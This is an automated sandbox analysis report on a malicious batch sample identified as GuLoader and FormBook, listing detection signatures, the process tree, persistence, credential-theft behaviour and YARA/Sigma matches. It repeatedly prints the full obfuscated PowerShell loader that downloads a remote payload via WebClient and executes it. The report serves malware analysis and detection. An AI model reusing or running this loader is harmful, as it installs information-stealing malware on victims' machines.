Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rFV-452747284IN.bat

Overview

General Information

Sample name:rFV-452747284IN.bat
Analysis ID:1471448
MD5:4eeae7ac7c9b2b2f6585cbfdb82ffd89
SHA1:7978841d26d2be27f6b873a6b3fca3bd999329aa
SHA256:96510f0af47cb70914f106bd98fc99b4a5f782c744dbe587368f8614565a6f47
Tags:bat
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Obfuscated command line found
Queues an APC in another process (thread injection)
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 4204 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rFV-452747284IN.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4324 cmdline: powershell.exe -windowstyle hidden "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too] ,is:Paam: SupS St ePanccMicruMilirK.umiWafft irtyArguPMortrpr goBecotCutao BlocBo uoEufolspri C.nc=.ldr Geni[Ret.NKl,ke ertpost.S raS nteeDmp cBayouRgrirColliMorttBibly TilPBis r humoVenttPrteo Q acF nkoBetllUterT RawyUnnepScraeGste]K nd: Rom:SkurTMar lHjems Gul1 Slu2P,as ');$nucleli=$Tandemcykels[0];$Akkompagnatr142= (Antikvitetsforretnings 'Skra$ Ky.g UnflKl bo,nhobTapaaRelalHexa:run.LAtteeDuchntrkas,ydfbBaana.efrr Dr oFanen ProeHaphr MonsAabe=hausNDgndeDankw .ur-KalkO,ehebKredjPr sePrimc TestNont CoedS SnoyHemisDis,tS beeTrkpmSwop.H,stNLadde AartUdle.TrykWNarse Sl,bHj.pCoverl UdliBeroe TvenGlutt');$Akkompagnatr142+=$Metalism[1];Unthrust ($Akkompagnatr142);Unthrust (Antikvitetsforretnings 'se,v$L tlLPsyceFoinnBuresParab Va,aBundr S aoJordnTaute,oler,leksRati.g zpH.illeGrnsaUnded NoneDe.prStems Lg.[Phyt$.sycT tonoForsrUndiuAfs mVelbsPreslFelteLovejCenolCardi FoegSa.ghErhve Le dForus O,e]Revo=Sama$OpbiASkranWhimt Svno U,cnakvaiIsthnUdd aSukks Fun ');$barser=Antikvitetsforretnings 'Elev$AfgiLEccle AponAntrsYpp.b StoaYardrKvleoBangnUnteeKedlr O.es Dob.Em lDFortoK plw .avnAn,alud,ao,ilkaspend.rifF Un.i nylKr,meAnsg(Fl g$ZealnEndruAlvec en,lCa eeCa.alAfhsiSpu,,unde$InteOTe,ipForupTr gr fusoFustbGeorrAr,eiPeriaDirkt Usue RhedI.fo)Nonu ';$Opprobriated=$Metalism[0];Unthrust (Antikvitetsforretnings 'Cohe$H,nkgChenl.paroDiabbelseaDyrelRema: TiqRResse.indcHyphi rketRothe Sno=B.ie(PladTsubieDiaksUnretGrun-DeflPRumlaanaltWenchS.mp Skol$ tr,OSuccppilopantirDemioSammb Pror ini NonaPseltUncoe Tvrd Non)Ax,l ');while (!$Recite) {Unthrust (Antikvitetsforretnings 'Pans$Bilpg AtalAddyoEp cbWalda enilT,eo: OliFGelioCheerAfhrmH.ndgTilriTrafvFun,eSjasrUndee elp=B sa$GodttSi.orBooguCitae Ele ') ;Unthrust $barser;Unthrust (Antikvitetsforretnings '.ropSPrivt,ondaincorMi rtScor- ResSRteblS aseFor,eOp,lpRes Lip.4 ,il ');Unthrust (Antikvitetsforretnings ' tal$Ara gUnofl slaoNedkb ubaArvelAnte:linoRModte,olyc,itriFr.ttCapaebark= Gra( SheTVandeHu.dsUdfrt ,or-UnsiP ermavisstByelhHjer .nt$DecaO CripProlpElmir,nvlo SlabUntirBerriFedta Sprt SimeTangd,ifi)Gend ') ;Unthrust (Antikvitetsforretnings 'Ro,e$Spilg isjlPn.uo PrebOocya RevlAthl:PalmSSealafettpSlutrqu teLipomDomeivirgaRe,i1Dolo5Fler7Ra,n=emot$Brkeg NublMonaoCmrebSteaaBo glOver:C oiLDuk,aAasen VatdUndebD cirSpaduB.lmgS.iss Cazm PyosInstsPr,tilacigGutteUdsus ega+ Noe+T,bu%W ne$ Ri T Homanoncn Ma.d WanegrilmRo.fcNulpyB rokColoe cral ints,eso.Presc MitoBreauFlagnOvert F r ') ;$nucleli=$Tandemcykels[$Sapremia157];}$Hyacint=296268;$Shutterwise=28855;Unthrust (Antikvitetsforretnings 'Mast$GossgPoppl EndoimmabOpska,usel In,:AbraU lbid P sb N.nrSha eCh.mdCoareLuncs ou sge=Pret funkGUdd,eGrattOver-EnspC Arso BlonNasct Akae Klan watSa,t Fuzz$W,tcO.ocupundepDejlrSheaoPalebOsterBud.i.ispaForft FoseAcadd Fo ');Unthrust (Antikvitetsforretnings 'So,r$ MisgThrilTi so.prrbTrada aml.esk:ScypH Antnre.lsFl.geLin,a artvScenlS lkeSkvirFlgb Del=.mpe Sjle[GamoSBagay inisAccotDisseOrthmBa,y.RebuC,oneoA mrn astvJapaeg,rtrForutudre]Mirt: lo:Zo,aF D pr Mono.rotmJoveBProvaJa zs oite Bre6Be.l4InfaSSbeht AnerKooliov rnErytg R.d(Bril$MamlU BesdKes bSikkrEnc,e.ommd.arveMotisbagg),ndi ');Unthrust (Antikvitetsforretnings 'Ub.f$AnjagUmu,lrealoSkanbN tra re,lD kk:,ensEFrotr WelnArkaeNells QuatTraui D,snHov.eCam sBa.t Noe=Film Disr[SojaSOpskyMerlsUnfotNo,seG,ubmGuat.OyesTStdee Cr,xFordt dol.SvarEForln ColcDef,oKvetdHumbiSyltn WalgSe a]Klod:S rv:ProgALivsS venCAposIAnovIFilt.ScarGdokeeRespt .oaSModitSig,r illi kasn GlogLreb(Card$P,ncHD lanFor,scentePopuaSlusv usclDiskeLapirBal )Styr ');Unthrust (Antikvitetsforretnings 'Rumb$ RecgS,lvl PreoVarib N,paAnmelde,i:T.ttzAnthoSv.pb.verlTarde ,krn PlesHi,h=.alv$ UnmE,roorB,ndnRefreBn hsv,sttIndii ThenTe.lePinhsUrim.,ogfs Preu.hrebSporsSurrtSubsrReveiSignn z.ngUdsp(Fo,v$ diaHMessyTr.daOps,cAnslim stn eeltMart,Kont$ Fo.SOughhMit.uUntotFysitHat,eUnmorBu.lw FamiTutrsAdumePlan)Estr ');Unthrust $zoblens;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5344 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7108 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too] ,is:Paam: SupS St ePanccMicruMilirK.umiWafft irtyArguPMortrpr goBecotCutao BlocBo uoEufolspri C.nc=.ldr Geni[Ret.NKl,ke ertpost.S raS nteeDmp cBayouRgrirColliMorttBibly TilPBis r humoVenttPrteo Q acF nkoBetllUterT RawyUnnepScraeGste]K nd: Rom:SkurTMar lHjems Gul1 Slu2P,as ');$nucleli=$Tandemcykels[0];$Akkompagnatr142= (Antikvitetsforretnings 'Skra$ Ky.g UnflKl bo,nhobTapaaRelalHexa:run.LAtteeDuchntrkas,ydfbBaana.efrr Dr oFanen ProeHaphr MonsAabe=hausNDgndeDankw .ur-KalkO,ehebKredjPr sePrimc TestNont CoedS SnoyHemisDis,tS beeTrkpmSwop.H,stNLadde AartUdle.TrykWNarse Sl,bHj.pCoverl UdliBeroe TvenGlutt');$Akkompagnatr142+=$Metalism[1];Unthrust ($Akkompagnatr142);Unthrust (Antikvitetsforretnings 'se,v$L tlLPsyceFoinnBuresParab Va,aBundr S aoJordnTaute,oler,leksRati.g zpH.illeGrnsaUnded NoneDe.prStems Lg.[Phyt$.sycT tonoForsrUndiuAfs mVelbsPreslFelteLovejCenolCardi FoegSa.ghErhve Le dForus O,e]Revo=Sama$OpbiASkranWhimt Svno U,cnakvaiIsthnUdd aSukks Fun ');$barser=Antikvitetsforretnings 'Elev$AfgiLEccle AponAntrsYpp.b StoaYardrKvleoBangnUnteeKedlr O.es Dob.Em lDFortoK plw .avnAn,alud,ao,ilkaspend.rifF Un.i nylKr,meAnsg(Fl g$ZealnEndruAlvec en,lCa eeCa.alAfhsiSpu,,unde$InteOTe,ipForupTr gr fusoFustbGeorrAr,eiPeriaDirkt Usue RhedI.fo)Nonu ';$Opprobriated=$Metalism[0];Unthrust (Antikvitetsforretnings 'Cohe$H,nkgChenl.paroDiabbelseaDyrelRema: TiqRResse.indcHyphi rketRothe Sno=B.ie(PladTsubieDiaksUnretGrun-DeflPRumlaanaltWenchS.mp Skol$ tr,OSuccppilopantirDemioSammb Pror ini NonaPseltUncoe Tvrd Non)Ax,l ');while (!$Recite) {Unthrust (Antikvitetsforretnings 'Pans$Bilpg AtalAddyoEp cbWalda enilT,eo: OliFGelioCheerAfhrmH.ndgTilriTrafvFun,eSjasrUndee elp=B sa$GodttSi.orBooguCitae Ele ') ;Unthrust $barser;Unthrust (Antikvitetsforretnings '.ropSPrivt,ondaincorMi rtScor- ResSRteblS aseFor,eOp,lpRes Lip.4 ,il ');Unthrust (Antikvitetsforretnings ' tal$Ara gUnofl slaoNedkb ubaArvelAnte:linoRModte,olyc,itriFr.ttCapaebark= Gra( SheTVandeHu.dsUdfrt ,or-UnsiP ermavisstByelhHjer .nt$DecaO CripProlpElmir,nvlo SlabUntirBerriFedta Sprt SimeTangd,ifi)Gend ') ;Unthrust (Antikvitetsforretnings 'Ro,e$Spilg isjlPn.uo PrebOocya RevlAthl:PalmSSealafettpSlutrqu teLipomDomeivirgaRe,i1Dolo5Fler7Ra,n=emot$Brkeg NublMonaoCmrebSteaaBo glOver:C oiLDuk,aAasen VatdUndebD cirSpaduB.lmgS.iss Cazm PyosInstsPr,tilacigGutteUdsus ega+ Noe+T,bu%W ne$ Ri T Homanoncn Ma.d WanegrilmRo.fcNulpyB rokColoe cral ints,eso.Presc MitoBreauFlagnOvert F r ') ;$nucleli=$Tandemcykels[$Sapremia157];}$Hyacint=296268;$Shutterwise=28855;Unthrust (Antikvitetsforretnings 'Mast$GossgPoppl EndoimmabOpska,usel In,:AbraU lbid P sb N.nrSha eCh.mdCoareLuncs ou sge=Pret funkGUdd,eGrattOver-EnspC Arso BlonNasct Akae Klan watSa,t Fuzz$W,tcO.ocupundepDejlrSheaoPalebOsterBud.i.ispaForft FoseAcadd Fo ');Unthrust (Antikvitetsforretnings 'So,r$ MisgThrilTi so.prrbTrada aml.esk:ScypH Antnre.lsFl.geLin,a artvScenlS lkeSkvirFlgb Del=.mpe Sjle[GamoSBagay inisAccotDisseOrthmBa,y.RebuC,oneoA mrn astvJapaeg,rtrForutudre]Mirt: lo:Zo,aF D pr Mono.rotmJoveBProvaJa zs oite Bre6Be.l4InfaSSbeht AnerKooliov rnErytg R.d(Bril$MamlU BesdKes bSikkrEnc,e.ommd.arveMotisbagg),ndi ');Unthrust (Antikvitetsforretnings 'Ub.f$AnjagUmu,lrealoSkanbN tra re,lD kk:,ensEFrotr WelnArkaeNells QuatTraui D,snHov.eCam sBa.t Noe=Film Disr[SojaSOpskyMerlsUnfotNo,seG,ubmGuat.OyesTStdee Cr,xFordt dol.SvarEForln ColcDef,oKvetdHumbiSyltn WalgSe a]Klod:S rv:ProgALivsS venCAposIAnovIFilt.ScarGdokeeRespt .oaSModitSig,r illi kasn GlogLreb(Card$P,ncHD lanFor,scentePopuaSlusv usclDiskeLapirBal )Styr ');Unthrust (Antikvitetsforretnings 'Rumb$ RecgS,lvl PreoVarib N,paAnmelde,i:T.ttzAnthoSv.pb.verlTarde ,krn PlesHi,h=.alv$ UnmE,roorB,ndnRefreBn hsv,sttIndii ThenTe.lePinhsUrim.,ogfs Preu.hrebSporsSurrtSubsrReveiSignn z.ngUdsp(Fo,v$ diaHMessyTr.daOps,cAnslim stn eeltMart,Kont$ Fo.SOughhMit.uUntotFysitHat,eUnmorBu.lw FamiTutrsAdumePlan)Estr ');Unthrust $zoblens;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 1076 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 2508 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 4820 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • nPzDKsDmTWqJ.exe (PID: 6192 cmdline: "C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • clip.exe (PID: 5016 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)
              • nPzDKsDmTWqJ.exe (PID: 3228 cmdline: "C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
              • firefox.exe (PID: 6844 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • wab.exe (PID: 5284 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • rundll32.exe (PID: 3856 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • wab.exe (PID: 3424 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.2791447025.00000000028A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000A.00000002.2791447025.00000000028A0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a540:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13adf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000E.00000002.3034416950.0000000004020000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000E.00000002.3034416950.0000000004020000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a540:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13adf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000F.00000002.3289574543.0000000005790000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 16 entries

        Other

        SourceRuleDescriptionAuthorStrings
        amsi64_4324.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          amsi32_7108.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0xe411:$b2: ::FromBase64String(
          • 0xd495:$s1: -join
          • 0x6c41:$s4: +=
          • 0x6d03:$s4: +=
          • 0xaf2a:$s4: +=
          • 0xd047:$s4: +=
          • 0xd331:$s4: +=
          • 0xd477:$s4: +=
          • 0x16e51:$s4: +=
          • 0x16ed1:$s4: +=
          • 0x16f97:$s4: +=
          • 0x17017:$s4: +=
          • 0x171ed:$s4: +=
          • 0x17271:$s4: +=
          • 0xdcb8:$e4: Get-WmiObject
          • 0xdea7:$e4: Get-Process
          • 0xdeff:$e4: Start-Process
          • 0x17af2:$e4: Get-Process

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
          Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe" , CommandLine: "C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe, NewProcessName: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe, OriginalFileName: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 4820, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe" , ProcessId: 6192, ProcessName: nPzDKsDmTWqJ.exe
          Sigma detected: CurrentVersion Autorun Keys Modification
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\windows mail\wab.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\clip.exe, ProcessId: 5016, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FLY4H
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth 